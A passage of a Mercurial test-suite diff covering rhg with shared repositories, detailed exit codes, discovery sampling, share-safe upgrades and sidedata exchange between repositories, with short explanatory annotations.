+ $ echo "[extensions]" >> $HGRCPATH
+ $ echo "share = " >> $HGRCPATH
+
+ $ cd $TESTTMP
+ $ hg init repo1
+ $ echo a > repo1/a
+ $ hg -R repo1 commit -A -m'init'
+ adding a
+
+ $ hg share repo1 repo2
+ updating working directory
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+And check that basic rhg commands work with sharing
+
+ $ $NO_FALLBACK rhg files -R repo2
+ repo2/a
+ $ $NO_FALLBACK rhg -R repo2 cat -r 0 repo2/a
+ a
+
+Same with relative sharing
+
+ $ hg share repo2 repo3 --relative
+ updating working directory
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+ $ $NO_FALLBACK rhg files -R repo3
+ repo3/a
+ $ $NO_FALLBACK rhg -R repo3 cat -r 0 repo3/a
+ a
+
+Same with share-safe
+
+ $ echo "[format]" >> $HGRCPATH
+ $ echo "use-share-safe = True" >> $HGRCPATH
+
+ $ cd $TESTTMP
+ $ hg init repo4
+ $ cd repo4
+ $ echo a > a
+ $ hg commit -A -m'init'
+ adding a
+
+ $ cd ..
+ $ hg share repo4 repo5
+ updating working directory
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+And check that basic rhg commands work with sharing
+
+ $ cd repo5
+ $ $NO_FALLBACK rhg files
+ a
+ $ $NO_FALLBACK rhg cat -r 0 a
+ a
+
+The blackbox extension is supported
+
+ $ echo "[extensions]" >> $HGRCPATH
+ $ echo "blackbox =" >> $HGRCPATH
+ $ echo "[blackbox]" >> $HGRCPATH
+ $ echo "maxsize = 1" >> $HGRCPATH
+ $ $NO_FALLBACK rhg files > /dev/null
+ $ cat .hg/blackbox.log
+ ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files exited 0 after 0.??? seconds (glob)
+ $ cat .hg/blackbox.log.1
+ ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files (glob)
+
--- a/tests/test-rollback.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rollback.t Tue Apr 20 11:01:06 2021 -0400
@@ -103,7 +103,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status * (glob)
- [255]
+ [40]
$ cat .hg/last-message.txt ; echo
precious commit message
@@ -118,7 +118,7 @@
note: commit message saved in .hg/last-message.txt
note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit hook exited with status * (glob)
- [255]
+ [40]
$ cat .hg/last-message.txt
another precious commit message
@@ -380,7 +380,7 @@
warn during abort
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
$ hg commit -m 'commit 1'
warn during pretxncommit
@@ -405,7 +405,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
$ hg commit -m 'commit 1'
warn during pretxncommit
@@ -431,7 +431,7 @@
transaction abort!
warn during abort
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
$ hg verify
checking changesets
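
Many hunks in this section replace the generic exit code 255 with the
detailed codes from the exit-status work. A summary inferred from the
expected outputs in this series (not an authoritative list):

    EXIT_CODES = {
        10: 'input error, e.g. empty commit message',
        20: 'state error, e.g. outstanding merge conflicts',
        40: 'hook abort, e.g. a failing pretxncommit hook',
        50: 'storage error, e.g. unknown revlog version',
        252: 'rhg: unsupported feature',
        255: 'generic abort (legacy catch-all)',
    }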
--- a/tests/test-setdiscovery.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-setdiscovery.t Tue Apr 20 11:01:06 2021 -0400
@@ -1328,25 +1328,25 @@
updating to branch b
0 files updated, 0 files merged, 0 files removed, 0 files unresolved
- $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false
+ $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false --config devel.discovery.sample-size.initial=50
comparing with b
query 1; heads
searching for changes
taking quick initial sample
searching: 2 queries
- query 2; still undecided: 1080, sample size is: 100
+ query 2; still undecided: 1080, sample size is: 50
sampling from both directions
searching: 3 queries
- query 3; still undecided: 980, sample size is: 200
+ query 3; still undecided: 1030, sample size is: 200
sampling from both directions
searching: 4 queries
- query 4; still undecided: 497, sample size is: 210
+ query 4; still undecided: 547, sample size is: 210
sampling from both directions
searching: 5 queries
- query 5; still undecided: 285, sample size is: 220
+ query 5; still undecided: 336, sample size is: 220
sampling from both directions
searching: 6 queries
- query 6; still undecided: 63, sample size is: 63
+ query 6; still undecided: 114, sample size is: 114
6 total queries in *.????s (glob)
elapsed time: * seconds (glob)
round-trips: 6
@@ -1412,22 +1412,30 @@
missing: 1040
common heads: 3ee37d65064a
- $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.01
+ $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.20 --config devel.discovery.sample-size=50
comparing with b
searching for changes
sampling from both directions
- query 1; still undecided: 1340, sample size is: 200
+ query 1; still undecided: 1340, sample size is: 50
+ sampling from both directions
+ query 2; still undecided: 995, sample size is: 60
sampling from both directions
- query 2; still undecided: 795, sample size is: 202
+ query 3; still undecided: 913, sample size is: 72
sampling from both directions
- query 3; still undecided: 525, sample size is: 204
+ query 4; still undecided: 816, sample size is: 204
+ sampling from both directions
+ query 5; still undecided: 612, sample size is: 153
sampling from both directions
- query 4; still undecided: 252, sample size is: 206
+ query 6; still undecided: 456, sample size is: 123
+ sampling from both directions
+ query 7; still undecided: 332, sample size is: 147
sampling from both directions
- query 5; still undecided: 44, sample size is: 44
- 5 total queries in *s (glob)
- elapsed time: * seconds (glob)
- round-trips: 5
+ query 8; still undecided: 184, sample size is: 176
+ sampling from both directions
+ query 9; still undecided: 8, sample size is: 8
+ 9 total queries in *s (glob)
+ elapsed time: * seconds (glob)
+ round-trips: 9
heads summary:
total common heads: 1
also local heads: 0
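
The new sample sizes can be sanity-checked against the pinned configs: this
run uses devel.discovery.sample-size=50 with grow-sample.rate=1.20. The real
code applies further bounds (such as the size of the undecided set), so this
is only an approximation, and the rounding mode is a guess:

    def grow(size, rate=1.20):
        return int(round(size * rate))

    # queries 1-3 above: 50 -> 60 -> 72
    assert grow(50) == 60 and grow(60) == 72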
@@ -1580,3 +1588,175 @@
common: 0
missing: 1
common heads: 66f7d451a68b
+
+ $ cd ..
+
+
+Test debugging discovery using different subsets of the same repository
+=======================================================================
+
+remote is a local subset
+------------------------
+
+remote will be the last 25 heads of the local graph
+
+ $ cd $TESTTMP/manyheads
+ $ hg -R a debugdiscovery \
+ > --debug \
+ > --remote-as-revs 'last(heads(all()), 25)' \
+ > --config devel.discovery.randomize=false
+ query 1; heads
+ searching for changes
+ all remote heads known locally
+ elapsed time: * seconds (glob)
+ round-trips: 1
+ heads summary:
+ total common heads: 25
+ also local heads: 25
+ also remote heads: 25
+ both: 25
+ local heads: 260
+ common: 25
+ missing: 235
+ remote heads: 25
+ common: 25
+ unknown: 0
+ local changesets: 1340
+ common: 400
+ heads: 25
+ roots: 1
+ missing: 940
+ heads: 235
+ roots: 235
+ first undecided set: 940
+ heads: 235
+ roots: 235
+ common: 0
+ missing: 940
+ common heads: 0dfd965d91c6 0fe09b60448d 14a17233ce9d 175c0a3072cf 1c51e2c80832 1e51600e0698 24eb5f9bdbab 25ce09526613 36bd00abde57 426989fdefa0 596d87362679 5dd1039ea5c0 5ef24f022278 5f230dc19419 80b39998accb 88f40688ffb5 9e37ddf8c632 abf4d55b075e b2ce801fddfe b368b6ac3ce3 c959bf2e869c c9fba6ba4e2e d783207cf649 d9a51e256f21 e3717a4e3753
+
+local is a local subset
+------------------------
+
+local will be the first 25 heads of the local graph
+
+ $ cd $TESTTMP/manyheads
+ $ hg -R a debugdiscovery b \
+ > --debug \
+ > --local-as-revs 'first(heads(all()), 25)' \
+ > --config devel.discovery.randomize=false
+ comparing with b
+ query 1; heads
+ searching for changes
+ taking quick initial sample
+ query 2; still undecided: 375, sample size is: 81
+ sampling from both directions
+ query 3; still undecided: 3, sample size is: 3
+ 3 total queries *s (glob)
+ elapsed time: * seconds (glob)
+ round-trips: 3
+ heads summary:
+ total common heads: 1
+ also local heads: 0
+ also remote heads: 0
+ both: 0
+ local heads: 25
+ common: 0
+ missing: 25
+ remote heads: 1
+ common: 0
+ unknown: 1
+ local changesets: 400
+ common: 300
+ heads: 1
+ roots: 1
+ missing: 100
+ heads: 25
+ roots: 25
+ first undecided set: 400
+ heads: 25
+ roots: 1
+ common: 300
+ missing: 100
+ common heads: 3ee37d65064a
+
+both local and remote are subsets
+---------------------------------
+
+local will be the first 25 heads and remote the last 25 heads of the graph
+
+ $ cd $TESTTMP/manyheads
+ $ hg -R a debugdiscovery \
+ > --debug \
+ > --local-as-revs 'first(heads(all()), 25)' \
+ > --remote-as-revs 'last(heads(all()), 25)' \
+ > --config devel.discovery.randomize=false
+ query 1; heads
+ searching for changes
+ taking quick initial sample
+ query 2; still undecided: 375, sample size is: 81
+ sampling from both directions
+ query 3; still undecided: 3, sample size is: 3
+ 3 total queries in *s (glob)
+ elapsed time: * seconds (glob)
+ round-trips: 3
+ heads summary:
+ total common heads: 1
+ also local heads: 0
+ also remote heads: 0
+ both: 0
+ local heads: 25
+ common: 0
+ missing: 25
+ remote heads: 25
+ common: 0
+ unknown: 25
+ local changesets: 400
+ common: 300
+ heads: 1
+ roots: 1
+ missing: 100
+ heads: 25
+ roots: 25
+ first undecided set: 400
+ heads: 25
+ roots: 1
+ common: 300
+ missing: 100
+ common heads: 3ee37d65064a
+
+Test -T json output
+-------------------
+
+ $ hg -R a debugdiscovery \
+ > -T json \
+ > --debug \
+ > --local-as-revs 'first(heads(all()), 25)' \
+ > --remote-as-revs 'last(heads(all()), 25)' \
+ > --config devel.discovery.randomize=false
+ [
+ {
+ "elapsed": *, (glob)
+ "nb-common-heads": 1,
+ "nb-common-heads-both": 0,
+ "nb-common-heads-local": 0,
+ "nb-common-heads-remote": 0,
+ "nb-common-roots": 1,
+ "nb-head-local": 25,
+ "nb-head-local-missing": 25,
+ "nb-head-remote": 25,
+ "nb-head-remote-unknown": 25,
+ "nb-ini_und": 400,
+ "nb-ini_und-common": 300,
+ "nb-ini_und-heads": 25,
+ "nb-ini_und-missing": 100,
+ "nb-ini_und-roots": 1,
+ "nb-missing-heads": 25,
+ "nb-missing-roots": 25,
+ "nb-revs": 400,
+ "nb-revs-common": 300,
+ "nb-revs-missing": 100,
+ "output": "query 1; heads\nsearching for changes\ntaking quick initial sample\nquery 2; still undecided: 375, sample size is: 81\nsampling from both directions\nquery 3; still undecided: 3, sample size is: 3\n3 total queries in *s\n", (glob)
+ "total-roundtrips": 3
+ }
+ ]
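
The -T json form makes the summary machine-readable; a tiny hypothetical
consumer, using field names taken from the output above:

    import json, subprocess

    out = subprocess.check_output(
        ['hg', '-R', 'a', 'debugdiscovery', '-T', 'json', '--debug',
         '--local-as-revs', 'first(heads(all()), 25)',
         '--remote-as-revs', 'last(heads(all()), 25)',
         '--config', 'devel.discovery.randomize=false'])
    stats = json.loads(out)[0]
    # e.g. 100 missing out of 400 local changesets -> 0.25
    print(stats['nb-revs-missing'] / stats['nb-revs'])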
--- a/tests/test-share-bookmarks.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-share-bookmarks.t Tue Apr 20 11:01:06 2021 -0400
@@ -102,7 +102,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ hg book bm1
FYI, in contrast to above test, bmX is invisible in repo1 (= shared
@@ -127,7 +127,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ hg book bm3
clean up bm2 since it's uninteresting (not shared in the vfs case and
@@ -249,7 +249,7 @@
no changes found
adding remote bookmark bm3
abort: forced failure by extension
- [255]
+ [40]
$ hg boo
bm1 3:b87954705719
bm4 5:92793bfc8cad
--- a/tests/test-share-safe.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-share-safe.t Tue Apr 20 11:01:06 2021 -0400
@@ -7,6 +7,11 @@
> use-share-safe = True
> [storage]
> revlog.persistent-nodemap.slow-path=allow
+ > # enforce zlib to ensure we can upgrade to zstd later
+ > [format]
+ > revlog-compression=zlib
+ > # we want to be able to enable it later
+ > use-persistent-nodemap=no
> EOF
prepare source repo
@@ -352,18 +357,27 @@
- changelog
- manifest
- $ hg debugupgraderepo --run -q
+ $ hg debugupgraderepo --run
upgrade will perform the following actions:
requirements
preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
added: share-safe
+ share-safe
+ Upgrades a repository to share-safe format so that future shares of this repository share its requirements and configs.
+
processed revlogs:
- all-filelogs
- changelog
- manifest
+ beginning upgrade...
+ repository locked and read-only
+ creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob)
+ (it is safe to interrupt this process any time before data migration completes)
+ upgrading repository requirements
+ removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob)
repository upgraded to share safe mode, existing shares will still work in old non-safe mode. Re-share existing shares to use them in safe mode New shares will be created in safe mode.
$ hg debugrequirements
@@ -433,7 +447,7 @@
- changelog
- manifest
- $ hg debugupgraderepo -q --run
+ $ hg debugupgraderepo --run
upgrade will perform the following actions:
requirements
@@ -445,6 +459,12 @@
- changelog
- manifest
+ beginning upgrade...
+ repository locked and read-only
+ creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob)
+ (it is safe to interrupt this process any time before data migration completes)
+ upgrading repository requirements
+ removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob)
repository downgraded to not use share safe mode, existing shares will not work and needs to be reshared.
$ hg debugrequirements
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-sidedata-exchange.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,473 @@
+===========================
+Tests for sidedata exchange
+===========================
+
+Check simple exchange behavior
+==============================
+
+Pusher and pushed have sidedata enabled
+---------------------------------------
+
+ $ hg init sidedata-source --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-source/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ hg init sidedata-target --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-target/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ cd sidedata-source
+ $ echo a > a
+ $ echo b > b
+ $ echo c > c
+ $ hg commit -Am "initial"
+ adding a
+ adding b
+ adding c
+ $ echo aa > a
+ $ hg commit -m "other"
+ $ hg push -r . ../sidedata-target
+ pushing to ../sidedata-target
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 4 changes to 3 files
+ $ hg -R ../sidedata-target debugsidedata -c 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00:'
+ entry-0002 size 32
+ '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5'
+ $ hg -R ../sidedata-target debugsidedata -m 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata -m 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00\x81'
+ entry-0002 size 32
+ '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae'
+ $ hg -R ../sidedata-target debugsidedata a 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata a 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00\x03'
+ entry-0002 size 32
+ '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80'
+ $ cd ..
+
+Puller and pulled have sidedata enabled
+---------------------------------------
+
+ $ rm -rf sidedata-source sidedata-target
+ $ hg init sidedata-source --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-source/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ hg init sidedata-target --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-target/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ cd sidedata-source
+ $ echo a > a
+ $ echo b > b
+ $ echo c > c
+ $ hg commit -Am "initial"
+ adding a
+ adding b
+ adding c
+ $ echo aa > a
+ $ hg commit -m "other"
+ $ hg pull -R ../sidedata-target ../sidedata-source
+ pulling from ../sidedata-source
+ requesting all changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 4 changes to 3 files
+ new changesets 05da661850d7:7ec8b4049447
+ (run 'hg update' to get a working copy)
+ $ hg -R ../sidedata-target debugsidedata -c 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00:'
+ entry-0002 size 32
+ '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5'
+ $ hg -R ../sidedata-target debugsidedata -m 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata -m 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00\x81'
+ entry-0002 size 32
+ '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae'
+ $ hg -R ../sidedata-target debugsidedata a 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata a 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00\x03'
+ entry-0002 size 32
+ '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80'
+ $ cd ..
+
+Now on to asymmetric configs.
+
+Pusher has sidedata enabled, pushed does not
+--------------------------------------------
+
+ $ rm -rf sidedata-source sidedata-target
+ $ hg init sidedata-source --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-source/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ hg init sidedata-target --config format.exp-use-side-data=no
+ $ cd sidedata-source
+ $ echo a > a
+ $ echo b > b
+ $ echo c > c
+ $ hg commit -Am "initial"
+ adding a
+ adding b
+ adding c
+ $ echo aa > a
+ $ hg commit -m "other"
+ $ hg push -r . ../sidedata-target --traceback
+ pushing to ../sidedata-target
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 4 changes to 3 files
+ $ hg -R ../sidedata-target log -G
+ o changeset: 1:7ec8b4049447
+ | tag: tip
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: other
+ |
+ o changeset: 0:05da661850d7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: initial
+
+
+ $ hg -R ../sidedata-target debugsidedata -c 0
+ $ hg -R ../sidedata-target debugsidedata -c 1 -v
+ $ hg -R ../sidedata-target debugsidedata -m 0
+ $ hg -R ../sidedata-target debugsidedata -m 1 -v
+ $ hg -R ../sidedata-target debugsidedata a 0
+ $ hg -R ../sidedata-target debugsidedata a 1 -v
+ $ cd ..
+
+Pulled has sidedata enabled, puller does not
+--------------------------------------------
+
+ $ rm -rf sidedata-source sidedata-target
+ $ hg init sidedata-source --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-source/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ hg init sidedata-target --config format.exp-use-side-data=no
+ $ cd sidedata-source
+ $ echo a > a
+ $ echo b > b
+ $ echo c > c
+ $ hg commit -Am "initial"
+ adding a
+ adding b
+ adding c
+ $ echo aa > a
+ $ hg commit -m "other"
+ $ hg pull -R ../sidedata-target ../sidedata-source
+ pulling from ../sidedata-source
+ requesting all changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 4 changes to 3 files
+ new changesets 05da661850d7:7ec8b4049447
+ (run 'hg update' to get a working copy)
+ $ hg -R ../sidedata-target log -G
+ o changeset: 1:7ec8b4049447
+ | tag: tip
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: other
+ |
+ o changeset: 0:05da661850d7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: initial
+
+
+ $ hg -R ../sidedata-target debugsidedata -c 0
+ $ hg -R ../sidedata-target debugsidedata -c 1 -v
+ $ hg -R ../sidedata-target debugsidedata -m 0
+ $ hg -R ../sidedata-target debugsidedata -m 1 -v
+ $ hg -R ../sidedata-target debugsidedata a 0
+ $ hg -R ../sidedata-target debugsidedata a 1 -v
+ $ cd ..
+
+
+Check sidedata exchange with on-the-fly generation and removal
+==============================================================
+
+(Push) Target has strict superset of the source
+-----------------------------------------------
+
+ $ hg init source-repo --config format.exp-use-side-data=yes
+ $ hg init target-repo --config format.exp-use-side-data=yes
+ $ cat << EOF >> target-repo/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata.py
+ > EOF
+ $ cd source-repo
+ $ echo aaa > a
+ $ hg add a
+ $ hg commit -m a
+ $ echo aaa > b
+ $ hg add b
+ $ hg commit -m b
+ $ echo xxx >> a
+ $ hg commit -m aa
+
+No sidedata is generated in the source
+ $ hg debugsidedata -c 0
+
+Check that sidedata capabilities are advertised
+ $ hg debugcapabilities ../target-repo | grep sidedata
+ exp-wanted-sidedata=1,2
+
+We expect the client to abort the push since it's not capable of generating
+what the server is asking for
+ $ hg push -r . ../target-repo
+ pushing to ../target-repo
+ abort: cannot push: required sidedata category not supported by this client: '1'
+ [255]
+
+Add the required capabilities
+ $ cat << EOF >> .hg/hgrc
+ > [extensions]
+ > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py
+ > EOF
+
+We expect the target to have sidedata that was generated by the source on push
+ $ hg push -r . ../target-repo
+ pushing to ../target-repo
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 2 files
+ $ cd ../target-repo
+ $ hg debugsidedata -c 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x006'
+ entry-0002 size 32
+ '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde'
+ $ hg debugsidedata -m 2
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata a 1
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ cd ..
+
+(Push) Difference is not subset/superset
+----------------------------------------
+
+The source shares one sidedata category with the target, lacks one the
+target wants, and has one more the target does not want.
+
+ $ rm -rf source-repo target-repo
+ $ hg init source-repo --config format.exp-use-side-data=yes
+ $ cat << EOF >> source-repo/.hg/hgrc
+ > [extensions]
+ > testsidedata3=$TESTDIR/testlib/ext-sidedata-3.py
+ > EOF
+ $ hg init target-repo --config format.exp-use-side-data=yes
+ $ cat << EOF >> target-repo/.hg/hgrc
+ > [extensions]
+ > testsidedata4=$TESTDIR/testlib/ext-sidedata-4.py
+ > EOF
+ $ cd source-repo
+ $ echo aaa > a
+ $ hg add a
+ $ hg commit -m a
+ $ echo aaa > b
+ $ hg add b
+ $ hg commit -m b
+ $ echo xxx >> a
+ $ hg commit -m aa
+
+Check that sidedata capabilities are advertised
+ $ hg debugcapabilities . | grep sidedata
+ exp-wanted-sidedata=1,2
+ $ hg debugcapabilities ../target-repo | grep sidedata
+ exp-wanted-sidedata=2,3
+
+Sidedata is generated in the source, but only the right categories (entry-0001 and entry-0002)
+ $ hg debugsidedata -c 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x006'
+ entry-0002 size 32
+ '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde'
+ $ hg debugsidedata -m 2
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata a 1
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+
+
+We expect the target to have the sidedata that was generated by the source on
+push, minus the sidedata categories that the target does not support.
+Namely, we expect entry-0002 (only exchanged) and entry-0003 (generated),
+but not entry-0001.
+
+ $ hg push -r . ../target-repo --traceback
+ pushing to ../target-repo
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 2 files
+ $ cd ../target-repo
+ $ hg log -G
+ o changeset: 2:40f977031323
+ | tag: tip
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: aa
+ |
+ o changeset: 1:2707720c6597
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: b
+ |
+ o changeset: 0:7049e48789d7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: a
+
+ $ hg debugsidedata -c 0
+ 2 sidedata entries
+ entry-0002 size 32
+ entry-0003 size 48
+ $ hg debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0002 size 32
+ '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde'
+ entry-0003 size 48
+ '\x87\xcf\xdfI/\xb5\xed\xeaC\xc1\xf0S\xf3X\x1c\xcc\x00m\xee\xe6#\xc1\xe3\xcaB8Fk\x82e\xfc\xc01\xf6\xb7\xb9\xb3([\xf6D\xa6\xcf\x9b\xea\x11{\x08'
+ $ hg debugsidedata -m 2
+ 2 sidedata entries
+ entry-0002 size 32
+ entry-0003 size 48
+ $ hg debugsidedata a 1
+ 2 sidedata entries
+ entry-0002 size 32
+ entry-0003 size 48
+ $ cd ..
+
+(Pull) Target has strict superset of the source
+-----------------------------------------------
+
+ $ rm -rf source-repo target-repo
+ $ hg init source-repo --config format.exp-use-side-data=yes
+ $ hg init target-repo --config format.exp-use-side-data=yes
+ $ cat << EOF >> target-repo/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata.py
+ > EOF
+ $ cd source-repo
+ $ echo aaa > a
+ $ hg add a
+ $ hg commit -m a
+ $ echo aaa > b
+ $ hg add b
+ $ hg commit -m b
+ $ echo xxx >> a
+ $ hg commit -m aa
+
+No sidedata is generated in the source
+ $ hg debugsidedata -c 0
+
+Check that sidedata capabilities are advertised
+ $ hg debugcapabilities ../target-repo | grep sidedata
+ exp-wanted-sidedata=1,2
+
+ $ cd ../target-repo
+
+Add the required capabilities
+ $ cat << EOF >> .hg/hgrc
+ > [extensions]
+ > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py
+ > EOF
+
+We expect the target to have sidedata that it generated on-the-fly during pull
+ $ hg pull -r . ../source-repo --traceback
+ pulling from ../source-repo
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 2 files
+ new changesets 7049e48789d7:40f977031323
+ (run 'hg update' to get a working copy)
+ $ hg debugsidedata -c 0 --traceback
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata -c 1 -v --traceback
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x006'
+ entry-0002 size 32
+ '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde'
+ $ hg debugsidedata -m 2
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata a 1
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ cd ..
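
A minimal sketch of inspecting these entries programmatically, using the
sidedata() revlog accessor that this series also exercises in
test-revlog-raw.py; categories are plain integers mapped to raw bytes:

    def dump_changelog_sidedata(repo, rev):
        # {category (int) -> data (bytes)}; empty dict when nothing stored
        for category, data in sorted(repo.changelog.sidedata(rev).items()):
            print('entry-%04d size %d' % (category, len(data)))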
--- a/tests/test-sidedata.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-sidedata.t Tue Apr 20 11:01:06 2021 -0400
@@ -56,11 +56,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
